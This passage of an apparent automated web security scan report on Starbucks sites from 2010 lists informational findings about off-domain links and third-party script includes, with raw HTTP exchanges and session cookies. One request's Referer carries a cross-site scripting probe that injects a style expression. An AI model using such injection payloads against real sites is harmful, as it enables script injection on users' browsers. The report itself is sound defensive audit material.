Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb758;cat=starb781;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.10. http://www.starbucksstore.com/guestassist/shcontus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20694
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:46 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.11. http://www.starbucksstore.com/products/shprodde.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/shprodde.asp?SKU=317917 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35039
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:53 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.12. http://www.starbucksstore.com/products/shprodli.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27551
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:28 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

10. Cross-domain script include  previous  next
There are 91 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


10.1. http://www.starbucks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=e3f5py45fbmdq045dakdnm45; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:12:26 GMT
Content-Length: 41010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.2. http://www.starbucks.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:21 GMT
Connection: close
Content-Length: 38166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.3. http://www.starbucks.com/blog/610/check-in-at-starbucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/610/check-in-at-starbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/610/check-in-at-starbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:08 GMT
Connection: close
Content-Length: 65059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.4. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/611/my-starbucks-idea-s-100-000th-idea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/611/my-starbucks-idea-s-100-000th-idea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:43 GMT
Connection: close
Content-Length: 48282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.5. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/612/good-books-on-the-starbucks-digital-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/612/good-books-on-the-starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:03 GMT
Connection: close
Content-Length: 41705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.6. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/615/i-m-dreaming-of-cranberry-bliss-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/615/i-m-dreaming-of-cranberry-bliss-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.7. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/616/thanksgiving-blend-fit-for-a-feast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/616/thanksgiving-blend-fit-for-a-feast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.8. http://www.starbucks.com/coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:21 GMT
Content-Length: 56441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.9. http://www.starbucks.com/coffee/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:54 GMT
Connection: close
Content-Length: 37484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.10. http://www.starbucks.com/coffee/learn/clover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/clover HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:18 GMT
Connection: close
Content-Length: 38914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.11. http://www.starbucks.com/coffee/learn/flavors-in-your-cup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/flavors-in-your-cup HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:09 GMT
Connection: close
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.12. http://www.starbucks.com/coffee/starbucks-natural-fusions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close
Content-Length: 52282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The response dynamically includes the following script from another domain:

Request

